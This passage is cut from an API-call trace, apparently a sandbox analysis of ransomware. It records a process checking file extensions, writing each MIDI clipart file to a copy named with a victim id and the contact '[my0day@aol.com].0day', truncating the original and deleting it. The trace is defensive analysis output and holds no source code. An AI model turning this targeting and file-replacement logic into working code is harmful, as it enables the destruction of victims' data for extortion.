(lpString=".1cd") returned 4 [0270.733] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0270.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OCEAN_01.MID") returned 63 [0270.733] lstrlenW (lpString=".jpg") returned 4 [0270.733] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0270.733] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0270.733] lstrlenW (lpString="OUTDR_01.MID") returned 12 [0270.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0270.734] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=6644) returned 1 [0270.734] CloseHandle (hObject=0x354) returned 1 [0270.735] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid")) returned 0x20 [0270.735] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0270.735] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.735] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0271.129] GetLastError () returned 0x0 [0271.129] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x19f4, lpOverlapped=0x0) returned 1 [0271.143] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x1a00, lpOverlapped=0x0) returned 1 [0271.144] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.144] WriteFile (in: hFile=0x2c4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.144] SetEndOfFile (hFile=0x2c4) returned 1 [0271.144] CloseHandle (hObject=0x2c4) returned 1 [0271.144] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.144] SetEndOfFile (hFile=0x354) returned 1 [0271.147] CloseHandle (hObject=0x354) returned 1 [0271.148] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.148] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid")) returned 1 [0271.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.148] lstrlenW (lpString=".doc") returned 4 [0271.148] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.148] lstrlenW (lpString=".docx") returned 5 [0271.148] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.148] lstrlenW (lpString=".pdf") returned 4 [0271.148] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.148] lstrlenW (lpString=".xls") returned 4 [0271.148] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.148] lstrlenW (lpString=".xlsx") returned 5 [0271.148] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.148] lstrlenW (lpString=".ppt") returned 4 [0271.148] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.148] lstrlenW (lpString=".zip") returned 4 [0271.148] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.148] lstrlenW (lpString=".rar") returned 4 [0271.148] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.148] lstrlenW (lpString=".bz2") returned 4 [0271.148] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.148] lstrlenW (lpString=".7z") returned 3 [0271.149] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.149] lstrlenW (lpString=".dbf") returned 4 [0271.149] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.149] lstrlenW (lpString=".1cd") returned 4 [0271.149] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.149] lstrlenW (lpString=".jpg") returned 4 [0271.149] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.149] lstrlenW (lpString=".doc") returned 4 [0271.149] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.149] lstrlenW (lpString=".docx") returned 5 [0271.149] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0271.149] lstrlenW (lpString=".pdf") returned 4 [0271.149] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.149] lstrlenW (lpString=".xls") returned 4 [0271.149] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.149] lstrlenW (lpString=".xlsx") returned 5 [0271.149] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0271.149] lstrlenW (lpString=".ppt") returned 4 [0271.149] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.149] lstrlenW (lpString=".zip") returned 4 [0271.149] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.149] lstrlenW (lpString=".rar") returned 4 [0271.149] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.150] lstrlenW (lpString=".bz2") returned 4 [0271.150] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.150] lstrlenW (lpString=".7z") returned 3 [0271.150] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.150] lstrlenW (lpString=".dbf") returned 4 [0271.150] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.150] lstrlenW (lpString=".1cd") returned 4 [0271.150] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0271.150] lstrlenW (lpString=".jpg") returned 4 [0271.150] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.150] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.150] lstrlenW (lpString="PARNT_04.MID") returned 12 [0271.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0271.160] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=6070) returned 1 [0271.161] CloseHandle (hObject=0x1fc) returned 1 [0271.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid")) returned 0x20 [0271.178] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0271.178] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.179] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.179] GetLastError () returned 0x0 [0271.179] ReadFile (in: hFile=0x318, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x17b6, lpOverlapped=0x0) returned 1 [0271.192] WriteFile (in: hFile=0x390, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x17c0, lpOverlapped=0x0) returned 1 [0271.193] ReadFile (in: hFile=0x318, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.193] WriteFile (in: hFile=0x390, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.193] SetEndOfFile (hFile=0x390) returned 1 [0271.193] CloseHandle (hObject=0x390) returned 1 [0271.193] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.193] SetEndOfFile (hFile=0x318) returned 1 [0271.196] CloseHandle (hObject=0x318) returned 1 [0271.196] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.196] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid")) returned 1 [0271.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.197] lstrlenW (lpString=".doc") returned 4 [0271.197] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.197] lstrlenW (lpString=".docx") returned 5 [0271.197] lstrcmpiW (lpString1=".docx", lpString2="4.MID") returned -1 [0271.197] lstrlenW (lpString=".pdf") returned 4 [0271.197] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.197] lstrlenW (lpString=".xls") returned 4 [0271.197] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.197] lstrlenW (lpString=".xlsx") returned 5 [0271.197] lstrcmpiW (lpString1=".xlsx", lpString2="4.MID") returned -1 [0271.197] lstrlenW (lpString=".ppt") returned 4 [0271.197] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.197] lstrlenW (lpString=".zip") returned 4 [0271.197] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.197] lstrlenW (lpString=".rar") returned 4 [0271.197] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.197] lstrlenW (lpString=".bz2") returned 4 [0271.197] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.197] lstrlenW (lpString=".7z") returned 3 [0271.197] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.197] lstrlenW (lpString=".dbf") returned 4 [0271.198] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.198] lstrlenW (lpString=".1cd") returned 4 [0271.198] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.198] lstrlenW (lpString=".jpg") returned 4 [0271.198] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.198] lstrlenW (lpString=".doc") returned 4 [0271.198] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.198] lstrlenW (lpString=".docx") returned 5 [0271.198] lstrcmpiW (lpString1=".docx", lpString2="4.MID") returned -1 [0271.198] lstrlenW (lpString=".pdf") returned 4 [0271.198] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.198] lstrlenW (lpString=".xls") returned 4 [0271.198] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.198] lstrlenW (lpString=".xlsx") returned 5 [0271.198] lstrcmpiW (lpString1=".xlsx", lpString2="4.MID") returned -1 [0271.198] lstrlenW (lpString=".ppt") returned 4 [0271.198] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.198] lstrlenW (lpString=".zip") returned 4 [0271.198] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.198] lstrlenW (lpString=".rar") returned 4 [0271.198] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.198] lstrlenW (lpString=".bz2") returned 4 [0271.199] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.199] lstrlenW (lpString=".7z") returned 3 [0271.199] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.199] lstrlenW (lpString=".dbf") returned 4 [0271.199] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.199] lstrlenW (lpString=".1cd") returned 4 [0271.199] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 63 [0271.199] lstrlenW (lpString=".jpg") returned 4 [0271.199] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.199] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.199] lstrlenW (lpString="PARNT_08.MID") returned 12 [0271.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0271.199] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=7347) returned 1 [0271.199] CloseHandle (hObject=0x318) returned 1 [0271.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid")) returned 0x20 [0271.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0271.200] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.200] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.200] GetLastError () returned 0x0 [0271.200] ReadFile (in: hFile=0x318, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x1cb3, lpOverlapped=0x0) returned 1 [0271.214] WriteFile (in: hFile=0x390, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1cc0, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x1cc0, lpOverlapped=0x0) returned 1 [0271.215] ReadFile (in: hFile=0x318, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.215] WriteFile (in: hFile=0x390, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.215] SetEndOfFile (hFile=0x390) returned 1 [0271.215] CloseHandle (hObject=0x390) returned 1 [0271.216] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.216] SetEndOfFile (hFile=0x318) returned 1 [0271.218] CloseHandle (hObject=0x318) returned 1 [0271.218] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.218] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_08.mid")) returned 1 [0271.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.219] lstrlenW (lpString=".doc") returned 4 [0271.219] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.219] lstrlenW (lpString=".docx") returned 5 [0271.219] lstrcmpiW (lpString1=".docx", lpString2="8.MID") returned -1 [0271.219] lstrlenW (lpString=".pdf") returned 4 [0271.219] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.219] lstrlenW (lpString=".xls") returned 4 [0271.219] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.219] lstrlenW (lpString=".xlsx") returned 5 [0271.219] lstrcmpiW (lpString1=".xlsx", lpString2="8.MID") returned -1 [0271.219] lstrlenW (lpString=".ppt") returned 4 [0271.219] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.219] lstrlenW (lpString=".zip") returned 4 [0271.219] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.219] lstrlenW (lpString=".rar") returned 4 [0271.219] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.219] lstrlenW (lpString=".bz2") returned 4 [0271.219] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.219] lstrlenW (lpString=".7z") returned 3 [0271.219] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.219] lstrlenW (lpString=".dbf") returned 4 [0271.219] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.219] lstrlenW (lpString=".1cd") returned 4 [0271.219] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.219] lstrlenW (lpString=".jpg") returned 4 [0271.219] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.220] lstrlenW (lpString=".doc") returned 4 [0271.220] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.220] lstrlenW (lpString=".docx") returned 5 [0271.220] lstrcmpiW (lpString1=".docx", lpString2="8.MID") returned -1 [0271.220] lstrlenW (lpString=".pdf") returned 4 [0271.220] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.220] lstrlenW (lpString=".xls") returned 4 [0271.220] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.220] lstrlenW (lpString=".xlsx") returned 5 [0271.220] lstrcmpiW (lpString1=".xlsx", lpString2="8.MID") returned -1 [0271.220] lstrlenW (lpString=".ppt") returned 4 [0271.220] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.220] lstrlenW (lpString=".zip") returned 4 [0271.220] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.220] lstrlenW (lpString=".rar") returned 4 [0271.220] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.220] lstrlenW (lpString=".bz2") returned 4 [0271.220] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.220] lstrlenW (lpString=".7z") returned 3 [0271.220] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.220] lstrlenW (lpString=".dbf") returned 4 [0271.220] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.220] lstrlenW (lpString=".1cd") returned 4 [0271.221] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.221] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_08.MID") returned 63 [0271.221] lstrlenW (lpString=".jpg") returned 4 [0271.221] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.221] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.221] lstrlenW (lpString="PARNT_09.MID") returned 12 [0271.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_09.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_09.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0271.221] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=6764) returned 1 